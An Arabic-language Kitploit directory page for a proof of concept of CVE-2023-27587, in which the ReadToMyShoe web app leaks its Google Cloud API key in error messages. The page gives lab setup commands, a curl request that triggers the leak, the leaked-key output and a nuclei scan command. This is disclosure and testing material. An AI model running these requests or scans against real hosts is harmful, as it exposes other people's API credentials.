Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-27587-PoC — PoC البسيط لـ CVE-2023-27587 | Kitploit
أدوات/GitHubGitHub/vagnerd/cve-2023-27587-poc
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويبكشف الأسرارأمن واجهات برمجة التطبيقات
GitHubvagnerd/cve-2023-27587-poc

CVE-2023-27587-PoC

PoC البسيط لـ CVE-2023-27587

عرض المستودع
5164منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-27587-PoC

إثبات المفهوم البسيط لثغرة CVE-2023-27587

ما هو ReadToMyShoe؟

ReadtoMyShoe (RTMS) هو تطبيق ويب (rust وyew وaxum) يتيح لك رفع المقالات (عبر URL أو عبر اللصق المباشر) والاستماع إليها لاحقًا.

التأثير

إذا حدث خطأ أثناء إضافة مقال، يعرض الموقع رسالة خطأ للمستخدم. إذا كان الخطأ ناتجًا عن طلب Google Cloud TTS، فستتضمن الرسالة عنوان URL الكامل للطلب. ويحتوي عنوان URL الخاص بالطلب على مفتاح API الخاص بـ Google Cloud.

PoC

إعداد ReadtoMyShoe القابل للاستغلال

$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul

الاستغلال

لا يتم كشف المفتاح إلا عند حدوث خطأ في استدعاء GCP!

curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'content-type: application/json' \
  --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'

خطأ الاستجابة (مفتاح API المكشوف):

TTS failed: TTS request failed

Caused by:
    HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

Screenshot from 2023-03-15 13-03-59

nuclei-template

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml

$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

Screenshot from 2023-03-15 13-22-23

المراجع

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587

https://beta.readtomyshoe.com/

تنزيل الأداة